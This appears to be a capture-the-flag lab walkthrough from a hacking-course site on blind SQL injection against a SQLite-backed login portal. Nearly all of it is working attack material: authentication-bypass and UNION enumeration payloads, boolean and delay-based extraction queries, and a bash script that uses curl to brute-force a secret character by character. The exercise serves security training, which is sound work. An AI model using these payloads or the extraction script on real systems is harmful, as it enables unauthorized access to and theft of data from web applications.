Step 1: Click on the green button to Start the Lab
Step 2: Hack the URL or IP of the lab
Step 3: Use your skills and logic to find the flags!
SQL injection is one of the most critical web application vulnerabilities. This challenge demonstrates a blind SQL injection scenario where you don't see direct database output but can infer information through application behavior and response differences.
<target-ip>:80
to view the login portalUsername: admin'
Password: anything
Username: admin' OR '1'='1' --
Password: anything
Username: admin' AND 1=(SELECT COUNT(*) FROM users) --
Password: anything
# This should return "Welcome admin!":
Username: admin' OR '1'='1' --
# This should return "Invalid username or password":
Username: admin' OR '1'='2' --
Username: admin' UNION SELECT 1,2,3 --
Username: admin' UNION SELECT 1,username,role FROM users --
Username: admin' UNION SELECT 1,sqlite_version(),3 --
# IMPORTANT: Don't use 'admin' for UNION queries since admin exists in DB!
# Use non-existent username for UNION-based enumeration:
Username: xyz' UNION SELECT 1,name,3 FROM sqlite_master WHERE type='table' LIMIT 1 OFFSET 0 --
Username: xyz' UNION SELECT 1,name,3 FROM sqlite_master WHERE type='table' LIMIT 1 OFFSET 1 --
# Boolean-based enumeration (works with any username):
Username: admin' AND (SELECT COUNT(*) FROM sqlite_master WHERE name='secrets')>0 --
Username: admin' AND (SELECT COUNT(*) FROM sqlite_master WHERE name='users')>0 --
Username: admin' UNION SELECT 1,sql,3 FROM sqlite_master WHERE name='secrets' --
# This will show the CREATE TABLE statement revealing column names
Username: admin' UNION SELECT 1,flag,3 FROM secrets --
# Extract flag length:
Username: admin' AND (SELECT LENGTH(flag) FROM secrets WHERE id=1)=36 --
# Extract first character:
Username: admin' AND (SELECT SUBSTR(flag,1,1) FROM secrets WHERE id=1)='a' --
# Extract second character:
Username: admin' AND (SELECT SUBSTR(flag,2,1) FROM secrets WHERE id=1)='b' --
# Continue this process for all 36 characters...
#!/bin/bash
flag=""
target="<target-ip>" # Replace with actual target IP/hostname
echo "Starting flag extraction..."
for i in {1..36}; do
found=false
# UUID format: only uses 0-9, a-f, and hyphens
for char in {0..9} {a..f} -; do
response=$(curl -s -X POST \
-d "username=admin' AND (SELECT SUBSTR(flag,$i,1) FROM secrets WHERE id=1)='$char' --&password=test" \
"http://$target/login")
if [[ $response == *"Welcome"* ]]; then
flag+="$char"
echo "Found char $i: $char (Flag so far: $flag)"
found=true
break
fi
done
if [[ $found == false ]]; then
echo "Could not find character $i, stopping"
break
fi
done
echo "Final flag: $flag"
Username: admin' UNION SELECT 1,flag,role FROM secrets,users WHERE users.id=1 --
Username: admin' OR username=(SELECT flag FROM secrets WHERE id=1) --
# Use LIKE with wildcards to cause delays on large datasets
Username: admin' AND (SELECT flag FROM secrets WHERE id=1) LIKE '%a%' AND (SELECT COUNT(*) FROM sqlite_master,sqlite_master,sqlite_master) --
SELECT * FROM users WHERE username='$input' AND password='$password'
Sign-in to your account to access your hacking courses and cyber security labs.
Access all hacking courses and cyber security labs.